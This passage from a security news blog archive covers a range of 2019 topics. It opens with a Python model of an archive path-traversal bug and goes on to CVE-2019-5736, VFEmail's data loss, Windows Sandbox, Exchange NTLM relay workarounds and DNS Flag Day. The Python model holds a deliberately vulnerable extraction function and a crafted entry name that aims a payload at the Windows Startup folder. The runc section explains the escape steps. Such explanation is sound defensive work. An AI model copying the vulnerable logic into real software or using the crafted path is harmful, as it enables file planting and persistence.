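           "\\Start Menu\\Programs\\Startup")


def clean_path_once(name):
    """Single-pass clean-up as modelled here: strip one leading 'C:\\'."""
    return name[len(DRIVE_PREFIX):] if name[:3].upper() == DRIVE_PREFIX else name


def passes_traversal_check(name):
    """Validator that trusts the clean-up: rejects '..' components and a
    leading backslash, but never looks for a drive letter."""
    parts = name.replace("/", "\\").split("\\")
    return ".." not in parts and not name.startswith("\\")


def target_vulnerable(entry_name, extract_dir=EXTRACT_DIR):
    """Modelled pre-fix flow: clean once, check, then join. An absolute
    path that survives the single clean-up is used as-is."""
    cleaned = clean_path_once(entry_name)
    if not passes_traversal_check(cleaned):
        return None
    if re.match(r"^[A-Za-z]:\\", cleaned):
        return ntpath.normpath(cleaned)            # escapes extract_dir
    return ntpath.normpath(ntpath.join(extract_dir, cleaned))


def target_fixed(entry_name, extract_dir=EXTRACT_DIR):
    """Hardened flow: normalise first, reject drive letters, leading
    separators and upward components, then confirm containment."""
    norm = ntpath.normpath(entry_name.replace("/", "\\"))
    drive, rest = ntpath.splitdrive(norm)
    if drive or rest.startswith("\\") or rest == ".." or rest.startswith("..\\"):
        return None
    root = ntpath.normpath(extract_dir)
    full = ntpath.normpath(ntpath.join(root, rest))
    if not full.lower().startswith(root.lower() + "\\"):
        return None
    return full


# The doubled-prefix entry name from the write-up: 'C:\C:\Users\...\Startup\payload.exe'
DOUBLE_DRIVE_ENTRY = DRIVE_PREFIX + STARTUP + "\\payload.exe"

if __name__ == "__main__":
    for name in (DOUBLE_DRIVE_ENTRY, "docs\\readme.txt", "..\\..\\evil.exe"):
        print(f"{name[:40]:42} vulnerable={target_vulnerable(name)!r:60} fixed={target_fixed(name)!r}")
```

The general lesson is the order of operations: a check that runs after a one-shot sanitiser inherits every case the sanitiser missed, so either sanitise to a fixed point or, better, validate the final resolved path against the directory it must stay inside.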


Container Escape

    Over the years there has been a fundamental shift in software development practices. In the past it was typical to build and maintain large monolithic code bases and run them on large servers, individual virtual machines or even bare metal. Now, as many of us know, applications are packaged as small services, loosely coupled into what is called a microservices architecture, across a group of distributed commodity hardware. The layering this creates between application and host environments makes patches and updates fast and easy to apply across the stack and helps maintain overall security compliance, but it also means the boundary between container and host is itself a security control.
    This past January a severe vulnerability was disclosed affecting these containerized environments: CVE-2019-5736, which lets an attacker escape from a container to the host through runc (docker-runc), the low-level runtime used by Docker, cri-o, containerd and Kubernetes. Note that the attacker must already be able to run code as root inside the target container, for example by supplying a malicious image or compromising a process in it. The attacker's code replaces a dynamic library that runc will load once it is running in the container's context with a custom .so file carrying an extra global constructor. That constructor opens /proc/self/exe, which at that moment is the host's runc binary, for reading, obtaining a file descriptor (fd 3 in the researchers' description, opened before the execve), and then executes another binary. Because runc is no longer the running executable, that second binary can open /proc/self/fd/3 for writing and overwrite the host's runc file with arbitrary code.
    As the researchers describe the timeline: when a host user runs the affected container, a new runc process executes within the container but from the real binary on the host file system. That process, however, loads the attacker-controlled .so from the container file system. The malicious global constructor runs and launches the attacker-controlled binary, which overwrites runc on the host file system with a compromised copy. The next time any user starts a container on that host, the compromised runc runs in the host environment, fully compromising the system.
    The fix in runc copies its own binary into a sealed memory-backed file (memfd) and re-executes from that file descriptor before entering the container's namespaces, so the runc file on the host file system is never the one the container can reach through /proc/self/exe. Other mitigations include appropriately configured SELinux policy, mounting the affected binaries read-only, and lowering the privileges of users inside containers (user namespaces, and no root inside the container).


Wednesday, February 13, 2019

"Catastrophic” hack on VFEmail destroys almost two decades of data

!!!ALERT!!!! Update Feb 11 2019 and are currently unavailable in their prior form.
We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@
This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.

Main points:

  • If you didn't use, then your mailbox is gone. Send yourself an email to re-create it (if necessary).
  • After the initial incident on 2/11, incoming mail was queued on the sending servers.
    These should have started coming in within 12 hours, creating new mailboxes for existing accounts - 'new' mail should not be lost.
  • Accounts exist, the mail data does not. If your mailbox hasn't been re-created, you can't login. Send yourself an email to re-create it.
  • If you're one of the 10% who used webmail, your addressbook and calendars still exist.
  • If you can't login, use to login to webmail.
  • If you used POP. Change your mail server to
  • If you used IMAP. CREATE A NEW ACCOUNT, and use for the server name.
  • There is no control panel
  • Consider your mailbox data to be lost, but we haven't given up yet.
Timeline -
As of 5am 2/11/19 and are currently unavailable.
We have suffered catastrophic destruction at the hands of a hacker, last seen as aktv@
This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can.
New updates 2/11/19 6pm CST:
  • Incoming mail is now being delivered.
  • Webmail is up. Note-mailboxes are created upon new mail delivery. If you cannot login, you may not have received mail.
  • Mailboxes are new, no subfolders exist.
  • No filters are in place. If you created a filter with Horde, Login to Horde, Create any folders you need.
    Click Filter, Click Script, then click 'Activate Script'.
  • There is no spam scanning at this time - Incoming mail may be Spam scanned depending on DNS status.
  • Free users should not attempt to send email, there is currently no delivery mechanism for free accounts. Paid accounts should be usable, including Horde/Roundcube contacts and calendars.
  • NL hosted email is available (if you bought and requested a Migration).
At this time I am unsure of the status of existing mail for US users. If you have your own email client, DO NOT TRY TO MAKE IT WORK.
If you reconnect your client to your new mailbox, all your local mail will be lost.
AT YOUR OWN RISK - POP users can use ''
IMAP Users should create a new account, then use '' as the IMAP/SMTP server


  • If you are unable to login, send yourself an email from another location. Receipt of an email creates your new mailbox.
  • We have engaged a data recovery vendor to discuss options.
  • Mailboxes were shutdown for a short time while we move data between volumes
    We've used 11Gb of space in 2 days - FYI.
  • Vanity domains should receive mail properly now
  • If you were set to 'nobackup', you should start receiving mail now.
“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. “It will likely not return. I never thought anyone would care about my labor of love so much that they'd want to completely and thoroughly destroy it.”

VFEmail says data for virtually all US users is gone for good!

More about Windows Sandbox

Windows Sandbox is a new lightweight desktop environment tailored for safely running applications in isolation.

How many times have you downloaded an executable file, but were afraid to run it? Have you ever been in a situation which required a clean installation of Windows, but didn’t want to set up a virtual machine?

At Microsoft we regularly encounter these situations, so we developed Windows Sandbox: an isolated, temporary, desktop environment where you can run untrusted software without the fear of lasting impact to your PC. Any software installed in Windows Sandbox stays only in the sandbox and cannot affect your host. Once Windows Sandbox is closed, all the software with all its files and state are permanently deleted.

Windows Sandbox has the following properties:

  • Part of Windows – everything required for this feature ships with Windows 10 Pro and Enterprise. No need to download a VHD!
  • Pristine – every time Windows Sandbox runs, it’s as clean as a brand-new installation of Windows
  • Disposable – nothing persists on the device; everything is discarded after you close the application
  • Secure – uses hardware-based virtualization for kernel isolation, which relies on Microsoft’s hypervisor to run a separate kernel that isolates Windows Sandbox from the host
  • Efficient – uses integrated kernel scheduler, smart memory management, and virtual GPU

Prerequisites for using the feature

  • Windows 10 Pro or Enterprise Insider build 18305 or later
  • AMD64 architecture
  • Virtualization capabilities enabled in BIOS
  • At least 4GB of RAM (8GB recommended)
  • At least 1 GB of free disk space (SSD recommended)
  • At least 2 CPU cores (4 cores with hyperthreading recommended)

If you have this build, the steps to enable this feature are located here.

The information posted here comes from Microsoft.
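The following PowerShell is an added example (not from the Microsoft article above): it checks the prerequisites listed above on the local machine and enables the feature only if every check passes. It assumes an elevated prompt on the Windows 10 host, and that the optional feature name 'Containers-DisposableClientVM' (the name Windows uses for Windows Sandbox) is the correct one; that name is not on this page.

```powershell
# Added example, not Microsoft's code: verify the Windows Sandbox prerequisites
# and enable the optional feature. Run from an elevated PowerShell prompt.

function Test-SandboxPrerequisites {
    $os   = Get-CimInstance Win32_OperatingSystem
    $cs   = Get-CimInstance Win32_ComputerSystem
    $cpus = @(Get-CimInstance Win32_Processor)

    $cores   = ($cpus | Measure-Object -Property NumberOfCores -Sum).Sum
    $threads = ($cpus | Measure-Object -Property NumberOfLogicalProcessors -Sum).Sum
    # TotalVisibleMemorySize is reported in KB, so KB / 1MB gives GB
    $ramGB   = [math]::Round($os.TotalVisibleMemorySize / 1MB, 1)
    $sysDrive = Get-PSDrive -Name $env:SystemDrive.TrimEnd(':')
    $freeGB  = [math]::Round($sysDrive.Free / 1GB, 1)

    # VirtualizationFirmwareEnabled reads False once a hypervisor is already running
    # (for example when Hyper-V is enabled), so accept either signal.
    $virt = [bool]$cpus[0].VirtualizationFirmwareEnabled -or [bool]$cs.HypervisorPresent

    $checks = [ordered]@{
        'Windows 10 Pro or Enterprise'                        = ($os.Caption -match 'Pro|Enterprise')
        'Build 18305 or later'                                = ([int]$os.BuildNumber -ge 18305)
        'AMD64 architecture'                                  = ($env:PROCESSOR_ARCHITECTURE -eq 'AMD64')
        'Virtualization enabled in BIOS'                      = $virt
        "At least 4 GB RAM (have $ramGB GB)"                  = ($ramGB -ge 4)
        "At least 1 GB free disk (have $freeGB GB)"           = ($freeGB -ge 1)
        "At least 2 CPU cores (have $cores, $threads threads)" = ($cores -ge 2)
    }

    $ok = $true
    foreach ($name in $checks.Keys) {
        $state = if ($checks[$name]) { 'PASS' } else { $ok = $false; 'FAIL' }
        Write-Host ("[{0}] {1}" -f $state, $name)
    }
    return $ok
}

function Enable-WindowsSandbox {
    if (-not (Test-SandboxPrerequisites)) {
        Write-Warning 'One or more prerequisites failed; not enabling Windows Sandbox.'
        return
    }
    # Assumed feature name (known from Windows, not from this article)
    $featureName = 'Containers-DisposableClientVM'
    $feature = Get-WindowsOptionalFeature -Online -FeatureName $featureName
    if ($feature.State -eq 'Enabled') {
        Write-Host 'Windows Sandbox is already enabled.'
        return
    }
    # -NoRestart defers the reboot; the feature is usable only after restarting.
    Enable-WindowsOptionalFeature -Online -FeatureName $featureName -All -NoRestart
}

Enable-WindowsSandbox
```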

Tuesday, February 12, 2019

Internet Romance Scams Be Warned

The Federal Trade Commission (FTC) has released an article addressing a rise in reports of internet romance scams. In this type of fraud, cyber criminals gain the confidence of their victims and trick them into sending money. Use caution when online dating, and never send money or gifts to someone you have not met in person.

The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users to review FTC’s article on Romance Scams and NCCIC’s tip on Staying Safe on Social Networking Sites. If you think you have been a target of a romance scam, file a report with

Ransomware Attack Via MSP Locks Customers Out of Systems

Vulnerable plugin for a remote management tool gave attackers a way to encrypt systems belonging to all customers of a US-based MSP.
An attacker this week simultaneously encrypted endpoint systems and servers belonging to all customers of a US-based managed service provider by exploiting a vulnerable plugin for a remote monitoring and management tool used by the MSP.

The attack resulted in some 1,500 to 2,000 systems belonging to the MSP's clients getting cryptolocked and the MSP itself facing a $2.6 million ransom demand.

Discussions this week on an MSP forum on Reddit over what appears to be the same — or at least similar — incident suggest considerable anxiety within the community over such attacks, with a few describing them as a nightmare scenario.

To read the full article go here

Saturday, February 9, 2019

Google Store Has Vanity Apps That Open Users Up To Attack

    Some people like to look their best and sometimes reality just isn’t enough. With the addition of an altered reality landscape we can add and modify our worlds and ourselves through the lens of our phones. There are apps that can access your phone’s camera, detect your facial position, add features, correct color imbalances, enhance traits that we find desirable, and can remove elements that aren't so desirable. 

    Researchers at Trend Micro have found 29 beauty apps in the Google Play store that have malicious traits. These apps take a user’s desire to be more than what they are to open themselves up for attack. They are connected to remote ad configuration servers that receive data about the device the malicious app is installed upon and directs the victim to attacks tailored for that device.

    The authors of these malicious apps have included efforts to hide traces of their existence in a feeble attempt at permanence. Once downloaded, one of the packages included in these apps will provide the user a shortcut icon to impale themselves upon, but it will hide the app icon from the application list in an attempt to prevent its own deletion. 

    These apps have several methods of monetizing their targets including phishing for personal information, collecting freshly taken photos, or even just accepting payments for services not rendered. They can include false “contests” that result in a request for personal information to deliver a promised prize. One app offers to beautify an image uploaded to its server, but the user never receives the result, while the attacker compiles a data set full of images that can be used for future fraudulent social media profiles. Another app pushes an ad for a paid online pornography player which accepts payment and likely collects payment information. The researchers have found that the player does not play despite payment.

    The Google Play Store has already removed these apps from their roster. The top three (Pro Camera Beauty, Cartoon Art Photo, & Emoji Camera) have had over one million downloads each. The next eight have already had downloads in the hundreds of thousands. The large majority of these downloads occurred in Asia, particularly India. 

   The best recommendation is to read the reviews of any app that you want to try out. Any review indicating malicious behavior is sufficient warning. Anything produced by an untrusted source should be subject to scrutiny, and anything requesting information doubly so.
Source trendlabs-security-intelligence/ various-google-play-beauty-cameraapps-sends-users-pornographiccontent-redirects-them-to-phishingwebsites-and-collects-their-pictures/ news/0890709908/google-removes29-malicious-android-camera-appsfrom-play-store wordpress/80666/malware/ malicious-beauty-apps.html

Shortcut to Fear

     Siri sets alarms, calls your mother, and finds you that piece of trivia that’s been itching in your brain for the past week. Siri helps people manage their electronic fears and control their digital world in a human way. So when Siri Shortcuts came along with iOS 12, I’m sure many people were elated at the thought of automating their daily ritual and streamlining repeated complex tasks. 

    While it’s doubtful that most users will automate their household energy consumption or repeatedly perform multi step computations via voice command, the average user might be interested in shortcuts designed by business owners trying to make it smoother to exchange money for services and goods. Also, it just feels a bit cool to do many things with just a click. However, with automation and complexity there’s always an avenue for abuse. Security Intelligence from IBM has outlined a few methods for a pseudo ransom attack involving many of the capabilities of Siri Shortcut.

    The app has the ability to perform many of the phone’s basic functions which can be used to confuse then scare a user into paying a ransom to the attacker. Some of Siri Shortcuts’ capabilities include text to speech, flash light control, vibration control, volume and brightness control, clipboard data collection, data storage manipulation, IP address collection, GPS location information collection, and other forms of information collection.

   The most alarming capability is message creation and deployment along with contact list access. A maliciously crafted shortcut could send a copy of itself to each person in the victim’s contact list. It has been advised time and again to never download anything from an untrusted source, but who would think your grandson would send you anything malicious? Suddenly you’re at an ATM, your phone is vibrating and flashing, it snaps a picture of your face and your bank card, and tells you that you’re being tracked repeating your location and reading your browsing history. Even the most cool-headed person would be shaken and might fall for  the ruse. And if you’re savvy enough to remain composed and ignore it, a co-worker or a cousin might not be.

   An ounce of prevention is worth a pound of cure. Never install shortcuts from untrusted sources. Never allow anything to exist on your phone that requires permissions outside your comfort zone. Take advantage of the “Show Actions” button to see what a shortcut actually does before using it. Constant vigilance when it comes to anything that can run without your direct control is the minimum in this day and age.


Thursday, January 31, 2019

IDenticard PremiSys vulnerabilities

Industrial Control Systems Cyber Emergency Response Team Advisory: 01/31/2019 10:00 AM EST
This advisory provides mitigation recommendations for use of hard-coded credentials, use of hard-coded password, and inadequate encryption strength vulnerabilities reported in the IDenticard PremiSys access control system.


Wednesday, January 30, 2019

Cybersecurity Awareness Briefings


Cybersecurity Awareness Briefings Start Next Wednesday
Webinar: Chinese Cyber Activity Targeting Managed Service Providers
On December 20, 2018, the Cybersecurity and Infrastructure Security Agency (CISA) announced that malicious actors working on behalf of the Chinese government have been carrying out a campaign of cyber attacks targeting managed service providers (MSPs). Victims of these attacks have suffered from the loss of sensitive or proprietary information, as well as service disruptions, financial loss, and reputational harm. Organizations of all sizes, from all sectors, are still at risk for similar attacks in the future. Previously posted information on this threat can be found here:

Join CISA for a virtual Awareness Briefing to review the background of this threat, as well as recommended steps MSPs and their customers can take to protect themselves from future attacks.

Register now for one of two upcoming Awareness Briefings. Content is the same for each session.
  • Wednesday, February 6 at 1:00 p.m. ET
  • Friday, February 22 at 1:00 p.m. ET
Registration is limited, so please register early to guarantee your spot.
This is the latest installment in CISA’s ongoing Awareness Briefing series.
Recordings of previous Awareness Briefings are available at

Chinese APT10 intrusion activities target Government, Cloud-Computing Managed Service Providers and Customer networks worldwide

The following information is being provided by the FBI, with no guarantees or warranties, for potential use at the sole discretion of recipients in order to protect against cyber threats. This data is provided in order to help cyber security professionals and system administrators to guard against the persistent malicious actions of cyber criminals.  

This FLASH has been released TLP:WHITE. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction.

Chinese APT10 intrusion activities target Government, Cloud-Computing Managed Service Providers and Customer networks worldwide. The following information was obtained through FBI investigations and is provided in accordance with the FBI's mission and policies to prevent and protect against federal crimes and threats to the national security.

The FBI is providing the following information with HIGH confidence:

The FBI obtained information regarding a group of Chinese APT cyber actors stealing high value information from commercial and governmental victims in the U.S. and abroad. This Chinese APT group is known within private sector reporting as APT10, Cloud Hopper, menuPass, Stone Panda, Red Apollo, CVNX and POTASSIUM. This group heavily targets managed service providers (MSP) who provide cloud computing services; commercial and governmental clients of MSPs; as well as defense contractors and governmental entities. APT10 uses various techniques for initial compromise including spearphishing and malware. After initial compromise, this group seeks MSP administrative credentials to pivot between MSP cloud networks and customer systems to steal data and maintain persistence. This group has also used spearphishing to deliver malicious payloads and compromise victims.

WE NEED YOUR HELP! If you find any of these indicators on your networks, or have related information, please contact FBI CYWATCH immediately. Email: Phone: 1-855-292-3937

Tuesday, January 29, 2019

Deploying the Azure Information Protection scanner to automatically classify and protect files

If you have heard me talk, you know I say many times that we need to start classifying our data so that we can protect the critical files and add additional security to the files that are at the highest risk.
We need to protect data based on its risk. You may have heard me talk about RMS (Rights Management Service) or AIP (Azure Information Protection). Here is an article on a tool that will find and automatically classify files for you.

This article is for the current general availability version of the Azure Information Protection scanner.

If you are looking for deployment instructions for the current preview of the scanner, which includes configuration from the Azure portal, see Deploying the preview version of the Azure Information Protection scanner to automatically classify and protect files.

Use this information to learn about the Azure Information Protection scanner, and then how to successfully install, configure, and run it.

This scanner runs as a service on Windows Server and lets you discover, classify, and protect files on the following data stores:

  • Local folders on the Windows Server computer that runs the scanner.
  • UNC paths for network shares that use the Server Message Block (SMB) protocol.
  • Sites and libraries for SharePoint Server 2016 and SharePoint Server 2013. SharePoint 2010 is also supported for customers who have extended support for this version of SharePoint.

To scan and label files on cloud repositories, use Cloud App Security.

Overview of the Azure Information Protection scanner

When you have configured your Azure Information Protection policy for labels that apply automatic classification, files that this scanner discovers can then be labeled. Labels apply classification, and optionally, apply protection or remove protection.
The scanner can inspect any files that Windows can index, by using IFilters that are installed on the computer. Then, to determine if the files need labeling, the scanner uses the Office 365 built-in data loss prevention (DLP) sensitivity information types and pattern detection, or Office 365 regex patterns. Because the scanner uses the Azure Information Protection client, it can classify and protect the same file types.

You can run the scanner in discovery mode only, where you use the reports to check what would happen if the files were labeled. Or, you can run the scanner to automatically apply the labels. You can also run the scanner to discover files that contain sensitive information types, without configuring labels for conditions that apply automatic classification.

Note that the scanner does not discover and label in real time. It systematically crawls through files on data stores that you specify, and you can configure this cycle to run once, or repeatedly.

You can specify which file types to scan, or exclude from scanning. To restrict which files the scanner inspects, define a file types list by using Set-AIPScannerScannedFileTypes.

To learn more go Here

CERT/CC Reports Microsoft Exchange 2013 and Newer are Vulnerable to NTLM Relay Attacks

Original release date: January 28, 2019

The CERT Coordination Center (CERT/CC) has released information to address NTLM relay attacks affecting Microsoft Exchange 2013 and newer versions. A remote attacker could exploit this vulnerability to take control of an affected system.

Microsoft Exchange 2013 and newer fail to set signing and sealing flags on NTLM authentication traffic, which can allow a remote attacker to gain the privileges of the Exchange server.

Microsoft Exchange supports an API called Exchange Web Services (EWS). One of the EWS API functions is called PushSubscription, which can be used to cause the Exchange server to connect to an arbitrary website. Connections made using the PushSubscription feature will attempt to negotiate with the arbitrary web server using NTLM authentication. Starting with Microsoft Exchange 2013, the NTLM authentication over HTTP fails to set the NTLM Sign and Seal flags. The lack of signing makes this authentication attempt vulnerable to NTLM relay attacks.
Microsoft Exchange is by default configured with extensive privileges with respect to the Domain object in Active Directory. Because the Exchange Windows Permissions group has WriteDacl access to the Domain object, this means that the Exchange server privileges obtained using this vulnerability can be used to gain Domain Admin privileges for the domain that contains the vulnerable Exchange server.


An attacker that has credentials for an Exchange mailbox and also has the ability to communicate with both a Microsoft Exchange server and a Windows domain controller may be able to gain domain administrator privileges. It is also reported that an attacker without knowledge of an Exchange user's password may be able to perform the same attack by using an SMB to HTTP relay attack as long as they are in the same network segment as the Exchange server.


The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workarounds:

Disable EWS push/pull subscriptions

If you have an Exchange server that does not leverage EWS push/pull subscriptions, you can block the PushSubscription API call that triggers this attack. In an Exchange Management Shell window, execute the following commands:
    New-ThrottlingPolicy -Name NoEWSSubscription -ThrottlingPolicyScope Organization -EwsMaxSubscriptions 0
    Restart-WebAppPool -Name MSExchangeServicesAppPool

Remove privileges that Exchange has on the domain object

Please note that the following workaround was not developed by CERT and is not supported by Microsoft. Please test any workarounds in your environment to ensure that they work properly. Fix-DomainObjectDACL.ps1 is a PowerShell script that can be executed on either the Exchange Server or Domain Controller system. By default this script will check for vulnerable access control entries in the current Active Directory. When executed with Domain Admin privileges and the -Fix flag, this script will remove the ability for Exchange to write to the domain object.

Note that if you encounter an error about Get-ADDomainController not being recognized, you will need to install and import the ActiveDirectory PowerShell module, and then run Fix-DomainObjectDACL.ps1:
    Import-Module ServerManager
    Add-WindowsFeature RSAT-AD-PowerShell
    Import-Module ActiveDirectory

If the script reports that faulty ACE were found, run:
    .\Fix-DomainObjectDACL.ps1 -Fix

PowerShell may be configured to block the execution of user-provided .ps1 files. If this is the case, first find your current PowerShell execution policy with Get-ExecutionPolicy.
Temporarily allow the execution of the Fix-DomainObjectDACL.ps1 script by running:
    Set-ExecutionPolicy unrestricted
Once you are finished running the Fix-DomainObjectDACL.ps1 script, set the policy back to the original value as reported by Get-ExecutionPolicy:
    Set-ExecutionPolicy [POLICY]
The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review CERT/CC’s Vulnerability Note VU#465632 and consider the listed workarounds until patches are made available.
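As an added example (not the CERT/CC-referenced Fix-DomainObjectDACL.ps1 and not Microsoft's code), the following PowerShell performs a read-only audit of the domain object's DACL for the WriteDacl right described above, held by the Exchange Windows Permissions group. It assumes the ActiveDirectory module (RSAT-AD-PowerShell) is installed, and it reports findings without changing anything.

```powershell
# Added example: list access control entries on the domain head that grant WriteDacl
# to Exchange's security groups. Read-only; remediation is left to the referenced
# script's -Fix option (or a tested manual change) once findings are reviewed.

Import-Module ActiveDirectory

function Get-ExchangeDomainWriteDacl {
    param(
        # Trustees to look for; the page names 'Exchange Windows Permissions'.
        [string[]]$Trustee = @('Exchange Windows Permissions')
    )
    $domain = Get-ADDomain
    # The AD: drive is provided by the ActiveDirectory module; Get-Acl returns the
    # ActiveDirectorySecurity object for the domain object itself.
    $acl = Get-Acl -Path ("AD:\" + $domain.DistinguishedName)
    $writeDacl = [System.DirectoryServices.ActiveDirectoryRights]::WriteDacl

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # HasFlag also matches composite rights such as GenericAll, which include WriteDacl
        if (-not $ace.ActiveDirectoryRights.HasFlag($writeDacl)) { continue }
        # IdentityReference looks like 'CONTOSO\Exchange Windows Permissions'
        $name = $ace.IdentityReference.Value.Split('\')[-1]
        if ($Trustee -notcontains $name) { continue }
        [pscustomobject]@{
            Domain     = $domain.DNSRoot
            Trustee    = $ace.IdentityReference.Value
            Rights     = $ace.ActiveDirectoryRights
            Inherited  = $ace.IsInherited
            ObjectType = $ace.ObjectType   # all-zero GUID means the ACE covers the whole object
        }
    }
}

$findings = @(Get-ExchangeDomainWriteDacl)
if ($findings.Count -eq 0) {
    Write-Host 'No WriteDacl ACE for the Exchange groups was found on the domain object.'
} else {
    Write-Warning ("{0} ACE(s) grant WriteDacl on the domain object to Exchange groups." -f $findings.Count)
    $findings | Format-Table -AutoSize
}
```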

Saturday, January 26, 2019

Important Alert DNS Flag Day February 1, 2019 – Ensure Your Institution is Prepared

    On Friday, February 1, major DNS (Domain Name System) software and public DNS providers will remove support for workarounds accommodating authoritative DNS servers that don’t follow published operational standards [1]. Most EDU sites will not be affected; however, institutions using authoritative servers that don’t meet standards may find their IT-based resources unreachable by large portions of the Internet.
How to Determine if You’re Affected
  • Make a list of all the domains your institution owns.
  • Test the domains using the tools at the DNS Flag Day site [2] or the ISC EDNS Compliance Tester [3]. Note that all domains hosted at a given server will either pass or fail.
How to Fix an Apparent Non-Compliant Server
  • For domain names served by a third party, contact the responsible party immediately.
  • Make sure the failure isn’t a false report due to your authoritative server rate limiting the test tool.
  • Make sure firewalls are not blocking EDNS traffic. Allow UDP packets greater than 512 bytes and see the firewall discussion on the DNS Flag Day site [2].
  • Update your authoritative DNS server software.
    The “resolver”, or client side of DNS, initiates a sequence of queries ultimately leading to an "authoritative DNS server" that can answer a requested mapping (e.g. = The client resolver on your device is supported in the sequence-of-queries by a "recursive resolver", usually provided by the institution or Internet Service Provider. Most recursive resolvers now support EDNS (Extension Mechanisms for DNS). Absence of EDNS support in authoritative DNS servers requires workarounds by the recursive resolver. DNS Flag Day removes support for these workarounds.
     Even if an institution doesn't upgrade its own recursive resolvers to a version that removes support for the workarounds, because others in the world will be upgrading their recursive resolvers, access to the institution’s IT-based resources will be affected by the institution’s non-compliant authoritative DNS server.
     This post was provided by The Research and Education Networking Information Sharing and Analysis Center (REN-ISAC). 
    To see how this might affect our members, REN-ISAC quickly inspected 53 institutions residing within one U.S. state. We found that 30 showed no problem, 15 showed minor problems, and six showed serious problems. Two tested schools returned a result of “Fatal Error Detected”.
The following sites provide more information on how your organization can prepare:
[2] DNS Flag Day;
[3] ISC EDNS Compliance Tester;
Additional information can be found here
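To show what the compliance testers above actually exercise, here is an added PowerShell example (not from REN-ISAC or the DNS Flag Day tooling) that sends one plain and one EDNS0 SOA query, non-recursive, straight to an authoritative server and reports whether it answered normally, returned FORMERR, ignored the OPT record, or dropped the query. It assumes UDP/53 to the server is reachable; the server and zone names at the bottom are constructed placeholders, and this covers only a subset of the testers' checks.

```powershell
# Added example: minimal EDNS0 probe against an authoritative server.

function New-DnsSoaQuery {
    param([string]$Zone, [switch]$Edns)
    $b = New-Object System.Collections.Generic.List[byte]
    $b.AddRange([byte[]](0x1A, 0x2B))             # ID (fixed; fine for a one-off probe)
    $b.AddRange([byte[]](0x00, 0x00))             # flags: QR=0, RD=0 (non-recursive, like dig +norecurse)
    $b.AddRange([byte[]](0,1, 0,0, 0,0))          # QDCOUNT=1, ANCOUNT=0, NSCOUNT=0
    $b.AddRange([byte[]](0, [int][bool]$Edns))    # ARCOUNT=1 when an OPT record follows
    foreach ($label in $Zone.TrimEnd('.').Split('.')) {
        $raw = [Text.Encoding]::ASCII.GetBytes($label)
        $b.Add([byte]$raw.Length); $b.AddRange($raw)
    }
    $b.Add(0)                                     # root label terminates the QNAME
    $b.AddRange([byte[]](0,6, 0,1))               # QTYPE=SOA, QCLASS=IN
    if ($Edns) {
        # OPT pseudo-RR (RFC 6891): name=root, TYPE=41, CLASS=UDP payload size 4096
        # (larger than 512, which is what the firewall advice above is about),
        # TTL = extended RCODE 0 / version 0 / flags 0, RDLENGTH 0
        $b.AddRange([byte[]](0, 0,41, 0x10,0x00, 0,0,0,0, 0,0))
    }
    return $b.ToArray()
}

function Read-DnsResponse {
    param([byte[]]$Msg)
    $skipName = {                                 # advance past a (possibly compressed) name
        param($i)
        while ($true) {
            $len = $Msg[$i]
            if ($len -eq 0) { return $i + 1 }
            if (($len -band 0xC0) -eq 0xC0) { return $i + 2 }   # compression pointer
            $i += 1 + $len
        }
    }
    $rcode  = $Msg[3] -band 0x0F
    $counts = 0..3 | ForEach-Object { ($Msg[4 + 2*$_] * 256) + $Msg[5 + 2*$_] }
    $pos = (& $skipName 12) + 4                   # question: name, then QTYPE/QCLASS
    $opt = $null
    for ($n = 0; $n -lt ($counts[1] + $counts[2] + $counts[3]); $n++) {
        $pos = & $skipName $pos
        $type  = ($Msg[$pos] * 256) + $Msg[$pos + 1]
        $rdlen = ($Msg[$pos + 8] * 256) + $Msg[$pos + 9]
        if ($type -eq 41) {
            # in OPT, the TTL field carries extended RCODE (upper 8 bits), version, flags
            $rcode = ($Msg[$pos + 4] * 16) + $rcode
            $opt = @{ Version = $Msg[$pos + 5]; PayloadSize = ($Msg[$pos + 2] * 256) + $Msg[$pos + 3] }
        }
        $pos += 10 + $rdlen
    }
    return @{ Rcode = $rcode; Opt = $opt }
}

function Test-EdnsCompliance {
    param([string]$Server, [string]$Zone)
    foreach ($mode in 'plain', 'edns0') {
        $query = New-DnsSoaQuery -Zone $Zone -Edns:($mode -eq 'edns0')
        $udp = New-Object System.Net.Sockets.UdpClient
        $udp.Client.ReceiveTimeout = 3000
        try {
            $udp.Connect($Server, 53)
            [void]$udp.Send($query, $query.Length)
            $ep = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, 0)
            $r = Read-DnsResponse ($udp.Receive([ref]$ep))
            $verdict = switch ($mode) {
                'plain' { if ($r.Rcode -eq 0) { 'ok' } else { "rcode $($r.Rcode)" } }
                'edns0' {
                    if ($r.Rcode -eq 1) { 'FORMERR: server rejects EDNS (non-compliant)' }
                    elseif (-not $r.Opt) { 'no OPT in reply: EDNS ignored (non-compliant)' }
                    elseif ($r.Rcode -ne 0) { "rcode $($r.Rcode)" }
                    else { "ok (EDNS version $($r.Opt.Version), payload $($r.Opt.PayloadSize))" }
                }
            }
        } catch {
            # A timeout only on the EDNS probe is the classic symptom: a firewall or old
            # server drops queries that carry an OPT record or advertise > 512 bytes.
            $verdict = "no answer: $($_.Exception.Message)"
        } finally { $udp.Close() }
        "{0,-6} {1}" -f $mode, $verdict
    }
}

# Constructed placeholders; substitute your own authoritative server and zone.
Test-EdnsCompliance -Server 'ns1.example.edu' -Zone 'example.edu'
```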

Wednesday, January 23, 2019

Manufacturing RF Vulnerabilities

      Radio-frequency (RF) remote controllers are everywhere: they open your car and your garage, they connect peripherals to your computer. You will also find them widely used in manufacturing and construction. Being able to remotely control large and/or multiple pieces of equipment from one device offers convenience and increased productivity, but remote solutions are often implemented with security as an afterthought, if thought of at all.
